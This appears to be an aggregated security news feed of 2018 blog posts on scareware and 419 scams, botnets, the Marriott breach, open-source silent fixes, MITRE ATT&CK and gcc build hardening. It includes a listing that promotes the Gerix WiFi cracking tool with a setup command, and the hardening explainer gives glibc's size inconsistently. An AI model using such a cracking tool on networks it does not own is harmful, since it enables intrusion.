It's 2010 and I've recently stumbled upon yet another diverse portfolio of blackhat SEO domains this time serving rogue security software also known as scareware to unsuspecting users with the cybercriminals behind the campaign successfully earning fraudulent revenue in the process of monetizing access to malware-infected hosts largely relying on the utilization of an affiliate-network based type

Historical OSINT – Profiling a Portfolio of Active 419-Themed Scams

It's 2010 and I've recently decided to provide actionable intelligence on a variety of 419-themed scams in particular the actual malicious actors behind the campaigns with the idea to empower law enforcement and the community with the necessary data to track down and prosecute the malicious actors behind these campaigns. Related malicious and fraudulent emails known to have participated in the

Historical OSINT – Rogue Scareware Dropping Campaign Spotted in the Wild Courtesy of the Koobface Gang

It's 2010 and I've recently came across to a diverse portfolio of fake security software also known as scareware courtesy of the Koobface gang in what appears to be a direct connection between the gang's activities and the Russian Business Network. In this post I'll provide actionable intelligence on the infrastructure behind it and discuss in-depth the tactics techniques and procedures of the

Firestarter: Invent Security Review

Posted under:

It’s that time of year again. The time when Amazon takes over our lives. No, not the holiday shopping season but the annual re:Invent conference where Amazon Web Services takes over Las Vegas (really, all of it) and dumps a firehouse of updates on the world. Listen in to hear our take on new services like Transit Hub, Security Hub, and Control Tower.

Watch or listen:

- Rich (0) Comments Subscribe to our daily email digest

Ghosts of Botnets Past, Present, and Future

‘Twas the morning of October 21st, and all through the house many IoT devices were stirring, including a connected mouse. Of course, this wasn’t the night before Christmas, but rather the morning of Dyn — the 2016 DDoS attack on the service provider that took the entire East Coast offline for a few hours. The root of the attack: botnets, AKA unsecured IoT devices that were enslaved by Mirai malware. And though this attack made history back in 2016, botnet attacks and the manipulation of vulnerable IoT devices have shown no signs of slowing since. To explore how these attacks have evolved over time, let’s examine the past, present, and future of botnets.

The Past

Any internet-connected device could potentially become a botnet. A botnet is an aggregation of connected devices, which could include computers, mobile devices, IoT devices, and more that have been infected and thereby under the control of one malware variant. The owners of these devices are typically unaware their technology has been infected and thereby under the control of the malware author.

This infection and enslavement process came to a powerful fruition on that fateful October morning, as thousands of devices were manipulated by Mirai malware and transformed into botnets for cybercriminals’ malicious scheme. Cybercriminals used this botnet army to construct one of the largest DDoS attacks in recent history on DNS provider Dyn, which temporarily knocked major sites such as Twitter, Github, and Etsy offline.

The Present

Now, the Dyn attack is arguably one of the most infamous in all of security history. But that doesn’t mean the attacks stop there. Fast forward to 2018, and botnets are still just as prominent, if not more. Earlier in the year, we saw Satori emerge, which even borrowed code from Mirai, as well as Hide N Seek (HNS), which has managed to build itself up to 24,000 bots since January 10th.

What’s more — DDoS attacks, which are largely driven by botnets, have also showed no signs of slowing this year. Just take the recent WordPress attack for example, which actually involved an army of over 20,000 botnets attacking sites across the web.

The Future

Botnets don’t just have a past and present — they likely have a future as well. That’s because cybercriminals favor the potency of this ‘infect and enslave’ tactic, so much so that they’re trying to spread it far and wide. Turns out, according to one report, you can even rent an IoT botnet, as one Dark Web advertisement displayed a 50,000-device botnet for rent for a two-week duration to conduct one-hour attacks a rate of $3000 – $4000.

The good news is — the cybersecurity industry is preparing for the future of botnet attacks as well. In fact, we’ve engineered technology designed to fight back against the nature of insecure IoT devices — such as our Secure Home Platform solution.

However, a lot of the botnet attacks can be stopped by users themselves if they implement strong security practices from start. This means changing the default passwords on any new IoT device you get, keeping any and all software up-to-date, always using a firewall to detect unusual behavior, and implementing comprehensive security software to ensure that all your computers and devices have protection.

If users everywhere implement the right processes and products from the start, botnet attacks may eventually become a thing of the past, and won’t ever be part of the present again.

To learn more about IoT device security and our approach to it, be sure to follow us at @McAfee and @McAfee_Home.

The post Ghosts of Botnets Past, Present, and Future appeared first on McAfee Blogs.

Retails’ Nightmare Before Christmas

With the stresses of Black Friday and Cyber Monday shopping behind us, the holiday shopping season of 2018 has almost come to a close. However, despite all of the holiday cheer, something more sinister may be lurking on the horizon – a 14% increase in fraud attempts. This year, holiday shoppers were expected to spend a record $7.8 billion on the deals offered during Cyber Monday, simultaneously aligned with the peak of fraud attempts – as fraudsters are on the edge of their seat, waiting to take a hold of consumers’ financial details.

As cross channel fraud continues to grow, fraudsters are most likely to target shoppers via in-store traditional and online channels; however, the latest option to buy online and pick up in-store has proved to be inviting as well. Additionally, the increasing number of consumers purchasing high ticket items this holiday, i.e. smartphones and other tech devices, has also driven the average fraud ticket upward. These are not the only channels being impacted by fraudsters – recent studies have also identified fraudsters directing their aim the call center.

On another hand, the growing popularity of smart speakers has opened more doors for shopping capabilities, and by default, opened more doors for fraud. Out of voice device users, 29% are already utilizing them for shopping, with an additional 41% expected to join the trend.

Whether involving the call center, online or traditional channels, some retailers are stepping up their efforts to stop fraud, with three-fifths surveyed stating they are allocating resources to investigating and addressing fraud during the holidays especially.

For more information, check out our on-demand webinar: The Voice Trends and Fraud in Retail.

The post Retails’ Nightmare Before Christmas appeared first on Pindrop.

Question: “Why is Russia so good at getting women into technology?” Answer: Communist Propaganda

It is great to see someone is trying to drill into Russia’s technical hiring practices as some sort of example for study or exception, rather than the other way around (why does America suck at allowing women equal treatment). She believes there are several reasons for that: girls are expected to take up computer science … Continue reading Question: “Why is Russia so good at getting women into technology?” Answer: Communist Propaganda

The Year That Was – Cybersecurity Takeaways From 2018

So, what was 2018 like for you? Just another year, a whirlwind of happiness and heartbreaks, or a momentous one that will stay in your memory forever? In the cyberworld, a lot has happened this year. There were data breaches and bitcoin mining; social media platform hacks and spread of fake news; mass campaigns online and bank/ATM hacks. An eventful year, wouldn’t you say?

As governments around the world are exploring tightening their cyber security laws, security vendors are working on creating better and stronger tools to keep us safe online. Let’s take a quick look at the major security breaches that occurred over the year. In hindsight, we can understand better where we are failing and what steps we, the consumers, can take to protect our data and identity.

There have been such rampant phishing and data mining attacks, that even those who do not keep up with technology have now started feeling the heat of it. For example, when a large bank’s server was attacked, or the SIM card swipe fraud was uncovered, there was chaos everywhere.

Time to recapitulate the attacks that matter most to us, the consumers:

  1. Bank and ATM system hacks
  2. Phishing attacks: via email and social media platforms
  3. DDoS botnet attack: These attacks were mainly targeted at gaming sites and government websites, severely slowing down operation
  4. Hacking of customer bases: We have noted several significant data breaches over the year and it has become a major concern for the govt, industries and security firms.
  5. IoT attacks: Smart devices are the latest tech additions to our homes but when these are compromised, it may lead to the compromise of all connected devices. Users should adopt care while downloading apps because malicious apps can be used to corrupt, or control connected devices at home
  6. Public Wi-Fi: Using public Wi-Fi to transmit sensitive information or for carrying out financial transactions, expose users to hacking and data theft
  7. Hacking of social media platforms: As most of us are now signed on to some or the other popular social media platforms, we need to be extra careful about our data privacy and how much information we are sharing online.

As India remains vulnerable for Web Application Attacks, we need to gear up and maximize our security in the virtual space. Not only do we need to follow traditional security measures but also need to address new sources of threat like ATM hacks, Crypto mining and control of home IoT devices by cyber criminals. Awareness is key for an aware user to know about new threats and ways to combat them.

Sharing some safety tips to see you securely through the next year:

  • Monitor Digital Assistants – Prevent your digital assistants from becoming attack portals for cyber criminals. Limit the extent of control they have over other devices, if you can. Ensure your home router default password is changed and you update your software regularly, to patch any security vulnerabilities
  • Password is the key – The safety of your online accounts depends a lot on strong and unique passwords, that are a mix of upper case, lower case, symbols and are at least 12 characters long. Better still, opt for a well-known password manager.
  • Be Mindful – Always research and review apps before downloading. The same goes for new websites, or e-payment gateways. Further, download mobile apps only from genuine stores, like Google Play and Apple’s App Store, for they continually check and take down suspicious apps
  • Secure all your devices – Use a comprehensive security tool to scan content before downloading and send suspicious messages into the spam folder
  • Stay Informed – Stay on top of the latest in cybersecurity by following my blog and @McAfee_Home on Twitter. Don’t forget to listen to our podcast Hackable?


Ciao folks! See you in 2019.

Source Credits:


The post The Year That Was – Cybersecurity Takeaways From 2018 appeared first on McAfee Blogs.

Can Hackers Make Drones Drop out of the Sky?

While Amazon hasn’t begun using autonomous drones to deliver packages (yet), the aerial technology is becoming more and more popular. Hobbyists, racers, photographers, and even police departments have registered more than 1 million drones with the FAA. But is the emerging technology secure? 

In the latest episode of “Hackable?”, host Geoff Siskind travels to Johns Hopkins University to investigate. Listen as Geoff flies three different drones while researchers bombard them with cyber attacks. Learn if hackers can make drones drop out of the sky! 

Listen now to the award-winning podcast Hackable? on Apple Podcasts. You don’t want to miss this high-flying episode.  


The post Can Hackers Make Drones Drop out of the Sky? appeared first on McAfee Blogs.

Marriott Starwood data breach notification de-values customers

It’s never good news when a large organization makes headlines for a cybersecurity incident, but when they keep happening, even the most egregious data exposures become run-of-the-mill.

For example, take the latest record-setting event: the Marriott Starwood data breach, which exposed at least some data of approximately 500 million customers — and enough data to be dangerous to about 327 million of those customers. Not as big as the Yahoo breach reported in 2017, in which all of Yahoo’s users — three billion of them — were exposed. But the impact of the Marriott Starwood data breach is likely far greater.

The Marriott Starwood data breach, starting in 2014 and ongoing until this year, exposed some combination of “name, mailing address, phone number, email address, passport number, Starwood Preferred Guest (‘SPG’) account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences” for about 327 million of its customers.

Just five years ago, an enterprise that exposed personal data in a cyberattack would notify its customers — usually, by postal service — and provide access to assistance, which included some form of identity theft monitoring or protection to the violated customers.

We’ve come a long way since the 2013 Target breach, after which the retail giant cleaned up its cybersecurity act and made serious efforts to regain the trust of its customers. After it was breached, Target notified its affected customers, told them they would not be liable for charges made to their cards fraudulently, and offered them a year of free credit monitoring and identity theft protection. This came to be viewed as the baseline for breach response — but Target went beyond that. Target went on the offensive to protect itself and its customers from attack: it was one of the first major U.S. retailers to roll out EMV-compliant point of sale payment terminals and EMV chip and PIN payments cards (the Target REDCard).

Now, the baseline seems to be last year’s Equifax breach, after which it was clear that the consumer credit rating agency not only failed at defending its data but also failed at properly notifying affected consumers while also initially treating the event as a revenue-enhancement opportunity by offering an inadequate protection service for free — for the first year —  which turned into a paid subscription thereafter.

What happened?

Breach fatigue happened. By now, most consumers have had their personal details exposed multiple times by giant corporations, have been notified multiple times of their exposures, may even have tried using one of the many “first year free” credit monitoring and identity theft protection services.

Even the way Marriott Starwood data breach notifications were sent out to the hundreds of millions of customers whose data was compromised raised questions. While the email Marriott sent out claimed that notifications were being sent out to affected customers “on a rolling basis” starting on Nov. 30, it wasn’t until Dec. 10 that widespread reports of the notification began to surface — including reports that many of those notification messages went directly to the spam folder. For example, Martijn Grooten, the security researcher and editor of Virus Bulletin, tweeted that “If the Marriott breach notification email was marked as spam (as it was for me), here’s a possible reason why,” linking to a Spamhaus article that explained why Marriott’s notifications wound up in spam folders: Marriott used a sender domain for its email notifications — — that looked malicious. And while the notification mentioned that affected customers could enroll with the WebWatcher monitoring service, no link to that service was provided in the notification.

If the pattern hadn’t already been set by data breach responses like those from Yahoo and Equifax and many others like the marketing company Exactis, which also exposed hundreds of millions this year, it would certainly seem as if Marriott is breaking a new trail of arrogance and ignorance, repeating many of the same failures that some enterprises seem to think are acceptable. But the hospitality giant is merely adopting what has become a sorry standard for breach responses.

The post Marriott Starwood data breach notification de-values customers appeared first on Security Bytes.

These Silent Fixes are Silent Killers in Open Source Security

Veracode Open Source Silent Killer Silent Fix

When it comes to open source software, it’s natural for development and security leaders to want to know that the code they’re using is secure. Historically, they’ve relied on traditional software composition analysis solutions and the National Vulnerability Database to mine for open source issues. Yet there is a little-discussed fact that open source begets open source. We know that developers use open source libraries to speed up the development process by adding ready-made functionality to their code. The libraries that they select and use are called direct dependencies, and often times, those direct dependencies have dependencies of their own.

Just like any other piece of software, open source libraries often rely on other open source libraries to achieve the desired functionality and goal. When developers choose an open source library, they may not be aware of the indirect dependencies they are stitching into their software. At Veracode, we’ve seen anywhere from two to more than 10 levels of libraries being called on, one after the other. Once you start assessing each level of library, the volume of vulnerabilities can skyrocket beyond your team’s ability to manage them.

Using software composition analysis is an amazing first step to solving some of this open source risk, but what happens when an open source library contributor fixes a security vulnerability and doesn’t tell anyone? Or the time between submission and publication, with an organization like the National Vulnerability Database, is too long to wait?

A Database Is Only as Good as the Data it Captures

The National Vulnerability Database (NVD), upon which most traditional SCA solutions rely, is a robust and widely used source of vulnerability data available today, cataloguing tens of thousands of vulnerabilities across all application types and open source libraries. While it is no doubt a valuable and necessary library of flaws and fixes, through no fault of its own, the organization is unable to keep pace with the volume of vulnerabilities disclosed and updated on a daily basis. Open source library vulnerabilities get stuck in a logjam behind everything else that is disclosed.

It’s important to note that vulnerabilities only make it into the database if a software developer or independent security research submits them. It’s common for a vulnerability to be fixed, but never disclosed or submitted to the NVD. For example, the Apache Struts Remote Code Execution vulnerability – the same type that led to the Equifax breach in 2017 – was disclosed to the public in August 2018, but was patched in April of that same year.

Four months is plenty of time for malicious actors looking to take advantage of vulnerable software. If they were monitoring the commit logs of the library, they would have been aware of it before organizations could update to the latest version of the component.  

Machine Learning and Natural Language Close the Gap

Machine learning technology has the ability to automate the identification of potential security vulnerabilities from commit messages and bug reports. In open source projects, bugs are typically tracked with issue trackers, and code changes are merged in the form of commits to source control repositories. If an organization is able to monitor all of these repositories, and review each new bug issue and commit message, they could identify potential vulnerabilities. However, there are tens of thousands of open source repositories, with hundreds of thousands of bug tracking issues and commit messages to comb through, with new ones hitting every day.

Natural language processing and real machine learning can identify potential vulnerabilities in open source libraries with a high level of accuracy. By analyzing the patterns found in past commit messages and bug-tracking issues using machine learning, our model can identify when new commits or bug issues resemble a silent fix of a potential vulnerability. These potential vulnerabilities are then raised to security researchers.

These silent fixes can be a silent killer for your data protection.

Modern Software Composition Analysis Designed for Modern Application Development

We have developed our own database that includes all of the open source vulnerabilities in the NVD, as well as our own list of vulnerabilities in open source libraries that have not yet been disclosed to the NVD. In many cases, the vulnerabilities we find and record have either not been disclosed yet and are in the time between patching and full public disclosure, or in some cases, there was never any intent to disclose the vulnerability and its fix. There is a third category we track, which are “Reserved CVEs.” We take the Reserved CVE IDs from the NVD and then find the vulnerabilities in the public repos, in order to give you a head start on the fix prior to full public disclosure.

To learn more about how to use these silent fixes to your advantage by putting your development team on an even playing field with attackers, download our free white paper:

McAfee Advanced Threat Defense Incorporates the MITRE ATT&CK Framework to Help You Get the Play-by-Play Narrative on Adversaries

In the cybersecurity space, there’s a lot of talk about the “attacker advantage.” As a defender, you’re all too familiar with the concept. Every day, you and your team try to gain ground over adversaries who seem to get the jump on your defenses by exploiting the latest points of vulnerability. Gaining a better understanding of your adversaries and their work through the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) framework can help bolster your defenses. Available to everyone at no cost, ATT&CK is a shared knowledgebase of information about the techniques, tactics, and processes (TTPs) used in real-world campaigns.

What’s great about ATT&CK is that it not only gets into the details about how cybercriminals mastermind actual attacks, it also helps you strategize your defenses, align your security priorities, and make crucial adjustments to your arsenal. Ultimately, it helps you detect and respond more quickly and effectively when adversaries strike.

Additionally, since ATT&CK has been incorporated into security certification training courses, your junior analysts can upgrade their skill set. By gaining familiarity with the way adversaries act, your analysts can hone their threat-hunting abilities.

Another advantage is that everyone across your entire organization can speak the same language when communicating about security. The ATT&CK framework is a jargon-free zone. As a security professional, you can impart information to your peers and other stakeholders in ordinary, everyday language.

In close collaboration with the MITRE community, McAfee recognizes the value of the ATT&CK framework. With the latest release of McAfee Advanced Threat Defense, our advanced sandboxing analytics solution, we have mapped the ATT&CK framework directly to the reporting feature. McAfee Advanced Threat Defense offers a wide spectrum of easy-to-read, detailed reporting options—from summary reports for action prioritization to mapping results to the ATT&CK framework to analyst-grade malware data. We’ve made it really easy for analysts to quickly switch from identified TTPs in the McAfee Advanced Threat Defense MITRE ATT&CK report to the ATT&CK framework itself for a deeper dive into the specifics of any given attack or identified adversaries.

Apart from the all-important benefit of accelerating detection and response, incorporating the ATT&CK framework also helps analysts demystify their results when communicating with management and the executive team. When everyone uses a common framework to describe the realities of their risk, the whole organization can benefit by reaching consensus about security priorities.

To learn more about McAfee Advanced Threat Defense and the MITRE ATT&CK framework, check out these resources:

MITRE ATT&CK and ATT&CK are trademarks of The MITRE Corporation.

McAfee and the McAfee logo are trademarks or registered trademarks of McAfee, LLC or its subsidiaries in the United States and other countries. Other names and brands may be claimed as the property of others. Copyright ©2018 McAfee, LLC

The post McAfee Advanced Threat Defense Incorporates the MITRE ATT&CK Framework to Help You Get the Play-by-Play Narrative on Adversaries appeared first on McAfee Blogs.

Gerix WiFi Cracker – Wireless 802.11 Hacking Tool With GUI

Gerix WiFi Cracker – Wireless 802.11 Hacking Tool With GUI

Gerix WiFi cracker is an easy to use Wireless 802.11 Hacking Tool with a GUI, it was originally made to run on BackTrack and this version has been updated for Kali (2018.1).

To get it up and running make sure you do:

apt-get install qt4-dev-tools

Running Gerix Wireless 802.11 Hacking Tool

$ python

You can download Gerix here:

Or read more here.

Read the rest of Gerix WiFi Cracker – Wireless 802.11 Hacking Tool With GUI now! Only available at Darknet.

Improved Ghillie Suits (IGS)

Personally I wish someone had pushed for the phrase “future update ghillie suits” (FUGS) when they were thinking about “future warfare”. Instead the US Army is talking about Improved Ghillie Suits (IGS) to address the shortcomings of past designs. Notable issues: If you dress like a tree, you may be as flammable as one (several … Continue reading Improved Ghillie Suits (IGS)

Notes on Build Hardening

I thought I'd comment on a paper about "build safety" in consumer products, describing how software is built to harden it against hackers trying to exploit bugs.

What is build safety?

Modern languages (Java, C#, Go, Rust, JavaScript, Python, etc.) are inherently "safe", meaning they don't have "buffer-overflows" or related problems.

However, C/C++ is "unsafe", and is the most popular language for building stuff that interacts with the network. In other cases, while the language itself may be safe, it'll use underlying infrastructure ("libraries") written in C/C++. When we are talking about hardening builds, making them safe or security, we are talking about C/C++.

In the last two decades, we've improved both hardware and operating-systems around C/C++ in order to impose safety on it from the outside. We do this with  options when the software is built (compiled and linked), and then when the software is run.

That's what the paper above looks at: how consumer devices are built using these options, and thereby, measuring the security of these devices.

In particular, we are talking about the Linux operating system here and the GNU compiler gcc. Consumer products almost always use Linux these days, though a few also use embedded Windows or QNX. They are almost always built using gcc, though some are built using a clone known as clang (or llvm).

How software is built

Software is first compiled then linked. Compiling means translating the human-readable source code into machine code. Linking means combining multiple compiled files into a single executable.

Consider a program hello.c. We might compile it using the following command:

gcc -o hello hello.c

This command takes the file, hello.c, compiles it, then outputs -o an executable with the name hello.

We can set additional compilation options on the command-line here. For example, to enable stack guards, we'd compile with a command that looks like the following:

gcc -o hello -fstack-protector hello.c

In the following sections, we are going to look at specific options and what they do.

Stack guards

A running program has various kinds of memory, optimized for different use cases. One chunk of memory is known as the stack. This is the scratch pad for functions. When a function in the code is called, the stack grows with additional scratchpad needs of that functions, then shrinks back when the function exits. As functions call other functions, which call other functions, the stack keeps growing larger and larger. When they return, it then shrinks back again.

The scratch pad for each function is known as the stack frame. Among the things stored in the stack frame is the return address, where the function was called from so that when it exits, the caller of the function can continue executing where it left off.

The way stack guards work is to stick a carefully constructed value in between each stack frame, known as a canary. Right before the function exits, it'll check this canary in order to validate it hasn't been corrupted. If corruption is detected, the program exits, or crashes, to prevent worse things from happening.

This solves the most common exploited vulnerability in C/C++ code, the stack buffer-overflow. This is the bug described in that famous paper Smashing the Stack for Fun and Profit from the 1990s.

To enable this stack protection, code is compiled with the option -fstack-protector. This looks for functions that have typical buffers, inserting the guard/canary on the stack when the function is entered, and then verifying the value hasn't been overwritten before exit.

Not all functions are instrumented this way, for performance reasons, only those that appear to have character buffers. Only those with buffers of 8 bytes or more are instrumented by default. You can change this by adding the option --param ssp-buffer-size=n, where n is the number of bytes. You can include other arrays to check using -fstack-protector-strong instead. You can instrument all functions with -fstack-protector-all.

Since this feature was added, many vulnerabilities have been found that evade the default settings. Recently, -fstack-protector-strong has been added to gcc that significantly increases the number of protected functions. The setting -fstack-protector-all is still avoided due to performance cost, as even trivial functions which can't possibly overflow are still instrumented.

Heap guards

The other major dynamic memory structure is known as the heap (or the malloc region). When a function returns, everything in its scratchpad memory on the stack will lost. If something needs to stay around longer than this, then it must be allocated from the heap rather than the stck.

Just as there are stack buffer-overflows, there can be heap overflows, and the same solution of using canaries can guard against them.

The heap has two additional problems. The first is use-after-free, when memory on the heap is freed (marked as no longer in use), an then used anyway. The other is double-free, where the code attempts to free the memory twice. These problems don't exist on the stack, because things are either added to or removed from the top of the stack, as in a stack of dishes. The heap looks more like the game Jenga, where things can be removed from the middle.

Whereas stack guards change the code generated by the compiler, heap guards don't. Instead, the heap exists in library functions.

The most common library added by a linker is known as glibc, the standard GNU C library. However, this library is about 1.8-megabytes in size. Many of the home devices in the paper above may only have 4-megabytes total flash drive space, so this is too large. Instead, most of these home devices use an alternate library, something like uClibc or musl, which is only 0.6-megabytes in size. In addition, regardless of the standard library used for other features, a program my still replace the heap implementation with a custom one, such as jemalloc.

Even if using a library that does heap guards, it may not be enabled in the software. If using glibc, a program can still turn off checking internally (using mallopt), or it can be disabled externally, before running a program, by setting the environment variable MALLOC_CHECK_.

The above paper didn't evaluate heap guards. I assume this is because it can be so hard to check.


When a buffer-overflow is exploited, a hacker will overwrite values pointing to specific locations in memory. That's because locations, the layout of memory, are predictable. It's a detail that programmers don't know when they write the code, but something hackers can reverse-engineer when trying to figure how to exploit code.

Obviously a useful mitigation step would be to randomize the layout of memory, so nothing is in a predictable location. This is known as address space layout randomization or ASLR.

The word layout comes from the fact that the when a program runs, it'll consist of several segments of memory. The basic list of segments are:

  • the executable code
  • static values (like strings)
  • global variables
  • libraries
  • heap (growable)
  • stack (growable)
  • mmap()/VirtualAlloc() (random location)

Historically, the first few segments are laid out sequentially, starting from address zero. Remember that user-mode programs have virtual memory, so what's located starting at 0 for one program is different from another.

As mentioned above, the heap and the stack need to be able to grow as functions are called data allocated from the heap. The way this is done is to place the heap after all the fixed-sized segments, so that it can grow upwards. Then, the stack is placed at the top of memory, and grows downward (as functions are called, the stack frames are added at the bottom).

Sometimes a program may request memory chunks outside the heap/stack directly from the operating system, such as using the mmap() system call on Linux, or the VirtualAlloc() system call on Windows. This will usually be placed somewhere in the middle between the heap and stack.

With ASLR, all these locations are randomized, and can appear anywhere in memory. Instead of growing contiguously, the heap has to sometimes jump around things already allocated in its way, which is a fairly easy problem to solve, since the heap isn't really contiguous anyway (as chunks are allocated and freed from the middle). However, the stack has a problem. It must grow contiguously, and if there is something in its way, the program has little choice but to exit (i.e. crash). Usually, that's not a problem, because the stack rarely grows very large. If it does grow too big, it's usually because of a bug that requires the program to crash anyway.

ASLR for code

The problem for executable code is that for ASLR to work, it must be made position independent. Historically, when code would call a function, it would jump to the fixed location in memory where that function was know to be located, thus it was dependent on the position in memory.

To fix this, code can be changed to jump to relative positions instead, where the code jumps at an offset from wherever it was jumping from.

To  enable this on the compiler, the flag -fPIE (position independent executable) is used. Or, if building just a library and not a full executable program, the flag -fPIC (position independent code) is used.

Then, when linking a program composed of compiled files and libraries, the flag -pie is used. In other words, use -pie -fPIE when compiling executables, and -fPIC when compiling for libraries.

When compiled this way, exploits will no longer be able to jump directly into known locations for code.

ASLR for libraries

The above paper glossed over details about ASLR, probably just looking at whether an executable program was compiled to be position independent. However, code links to shared libraries that may or may not likewise be position independent, regardless of the settings for the main executable.

I'm not sure it matters for the current paper, as most programs had position independence disabled, but in the future, a comprehensive study will need to look at libraries as a separate case.

ASLR for other segments

The above paper equated ASLR with randomized location for code, but ASLR also applies to the heap and stack. The randomization status of these programs is independent of whatever was configured for the main executable.

As far as I can tell, modern Linux systems will randomize these locations, regardless of build settings. Thus, for build settings, it just code randomization that needs to be worried about. But when running the software, care must be taken that the operating system will behave correctly. A lot of devices, especially old ones, use older versions of Linux that may not have this randomization enabled, or be using custom kernels where it has been turned off.


Modern systems have dynamic/shared libraries. Most of the code of a typical program consists of standard libraries. As mentioned above, the GNU standard library glibc is 8-megabytes in size. Linking that into every one of hundreds of programs means gigabytes of disk space may be needed to store all the executables. It's better to have a single file on the disk,, that all programs can share it.

The problem is that every program will load libraries into random locations. Therefore, code cannot jump to functions in the library, either with a fixed or relative address. To solve this, what position independent code does is jump to an entry in a table, relative to its own position. That table will then have the fixed location of the real function that it'll jump to. When a library is loaded, that table is filled in with the correct values.

The problem is that hacker exploits can also write to that table. Therefore, what you need to do is make that table read-only after it's been filled in. That's done with the "relro" flag, meaning "relocation read-only". An additional flag, "now", must be set to force this behavior at program startup, rather than waiting until later.

When passed to the linker, these flags would be "-z relro -z now". However, we usually call the linker directly from the compiler, and pass the flags through. This is done in gcc by doing "-Wl,-z,relro -Wl,-z,now".

Non-executable stack

Exploiting a stack buffer overflow has three steps:
  • figure out where the stack is located (mitigated by ASLR)
  • overwrite the stack frame control structure (mitigated by stack guards)
  • execute code in the  buffer
We can mitigate the third step by preventing code from executing from stack buffers. The stack contains data, not code, so this shouldn't be a problem. In much the same way that we can mark memory regions as read-only, we can mark them no-execute. This should be the default, of course, but as the paper above points out, there are some cases where code is actually placed on the stack.

This open can be set with -Wl,-z,noexecstack, when compiling both the executable and the libraries. This is the default, so you shouldn't need to do anything special. However, as the paper points out, there are things that get in the way of this if you aren't careful. The setting is more what you'd call "guidelines" than actual "rules". Despite setting this flag, building software may result in an executable stack.

So, you may want to verify it after building software, such as using the "readelf -l [programname]". This will tell you what the stack has been configured to be.

Non-executable heap

The above paper focused on executable stack, but there is also the question of an executable heap. It likewise contains data and not code, so should be marked no-execute. Like for heap guards mentioned above, this isn't a build setting but a feature of the library. The default library for Linux, glibc, marks the heap no-execute. However, it appears the other standard libraries or alternative heaps mark the stack as executable.


The paper above doesn't discuss this hardening step, but it's an important one.

One reason for so many buffer-overflow bugs is that the standard functions that copy buffers have no ability to verify whether they've gone past the end of a buffer. A common recommendation for code is to replace those inherently unsafe functions with safer alternatives that include length checks. For example the notoriously unsafe function strcpy() can be replaced with strlcpy(), which adds a length check.

Instead of editing the code, the GNU compiler can do this automatically. This is done with the build option -O2 -D_FORTIFY_SOURCE=2.

This is only a partial solution. The compiler can't always figure out the size of the buffer being copied into, and thus will leave the code untouched. Only when the compiler can figure things out does it make the change.

It's fairly easy to detect if code has been compiled with this flag, but the above paper didn't look much into it. That's probably for the same reason it didn't look into heap checks: it requires the huge glibc library. These devices use the smaller libraries, which don't support this feature.

Format string bugs

Because this post is about build hardening, I want to mention format-string bugs. This is a common  bug in old code that can be caught by adding warnings for it in the build options, namely:
 -Wformat -Wformat-security -Werror=format-security
It's hard to check if code has been built with these options, however. Instead of simple programs like readelf that can verify many of the issues above, this would take static analysis tools that read the executable code and reverse engineer what's going on.

Warnings and static analysis

When building code, the compiler will generate warnings about confusion, possible bugs, or bad style. The compiler has a default set of warnings. Robust code is compiled with the -Wall, meaning "all" warnings, though it actually doesn't enable all of them. Paranoid code uses the -Wextra warnings to include those not included with -Wall. There is also the -pedantic or -Wpedantic flag, which warns on C compatibility issues.

All of these warnings can be converted into errors, which prevents the software from building, using the -Werror flag. As shown above, this can also be used with individual error names to make only some warnings into errors.

Optimization level

Compilers can optimize code, looking for common patterns, to make it go faster. You can set your desired optimization level.

Some things, namely the FORTIFY_SOURCE feature, don't work without optimization enabled. That's why in the above example, -O2 is specified, to set optimization level 2.

Higher levels aren't recommended. For one thing, this doesn't make code faster on modern, complex processors. The advanced processors you have in your desktop/mobile-phone themselves do extensive optimization. What they want is small code size that fits within cache. The -O3 level make code bigger, which is good for older, simpler processors, but is bad for modern, advanced processors.

In addition, the aggressive settings of -O3 have lead to security problems over "undefined behavior". Even -O2 is a little suspect, with some guides suggesting the proper optimization is -O1. However, some optimizations are actually more secure than no optimizations, so for the security paranoid, -O1 should be considered the minimum.

What about sanitizers?

You can compile code with address sanitizers that do more comprehensive buffer-overflow checks, as well as undefined behavior sanitizers for things like integer overflows.

While these are good for testing and debugging, they've proven so far too difficult to get working in production code. These may become viable in the future.


If  you are building code using gcc on Linux, here are the options/flags you should use:
-Wall -Wformat -Wformat-security -Werror=format-security -fstack-protector -pie -fPIE -D_FORTIFY_SOURCE=2 -O2 -Wl,-z,relro -Wl,-z,now -Wl,-z,noexecstack
If you are more paranoid, these options would be:
-Wall -Wformat -Wformat-security -Wstack-protector -Werror -pedantic -fstack-protector-all --param ssp-buffer-size=1 -pie -fPIE -D_FORTIFY_SOURCE=2 -O1 -Wl,-z,relro -Wl,-z,now -Wl,-z,noexecstack

Nterini – Fatoumata Diawara

In a story that I’m almost certain nobody has read (based on everyone I have asked about it)…hundreds of thousands of letters that were seized by British warships centuries ago, now are getting digitized for analysis by the Union of the German Academies of Sciences and Humanities. Somewhere in the U.K. National Archives in London, … Continue reading Nterini – Fatoumata Diawara

Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online

It was the last item on my list and Christmas was less than a week away. I was on the hunt for a white Northface winter coat my teenage daughter that she had duly ranked as the most-important-die-if-I-don’t-get-it item on her wishlist that year.

After fighting the crowds and scouring the stores to no avail, I went online, stressed and exhausted with my credit card in hand looking for a deal and a Christmas delivery guarantee.

Mistake #1: I was under pressure and cutting it way too close to Christmas.
Mistake #2: I was stressed and exhausted.
Mistake #3: I was adamant about getting the best deal.

Gimme a deal!

It turns out these mistakes created the perfect storm for a scam. I found a site with several name brand named coats available lower prices. I was thrilled to find the exact white coat and guaranteed delivery by Christmas. The cyber elves were working on my behalf for sure!

Only the coat never came and I was out $150.

In my haste and exhaustion, I overlooked a few key things about this “amazing” site that played into the scam. (I’ll won’t harp on the part about me calling customer service a dozen times, writing as many emails, and feeling incredible stupidity over my careless clicking)!

Stress = Digital Risk

I’m not alone in my holiday behaviors it seems. A recent McAfee survey, Stressed Holiday Online Shopping, reveals, unfortunately, that when it comes to online shopping, consumers are often more concerned about finding a deal online than they are with protecting their cybersecurity in the process. 

Here are the kinds of risks stressed consumers are willing to take to get a holiday deal online:

  • 53% think the financial stress of the holidays can lead to careless shopping online.
  • 56% said that they would use a website they were unfamiliar with if it meant they would save money.
  • 51% said they would purchase an item from an untrusted online retailer to get a good deal.
  • 31% would click on a link in an email to get a bargain, regardless of whether they were familiar with the sender.
  • When it comes to sharing personal information to get a good deal: 39% said they would risk sharing their email address, 25% would wager their phone number, and 16% percent would provide their home address.
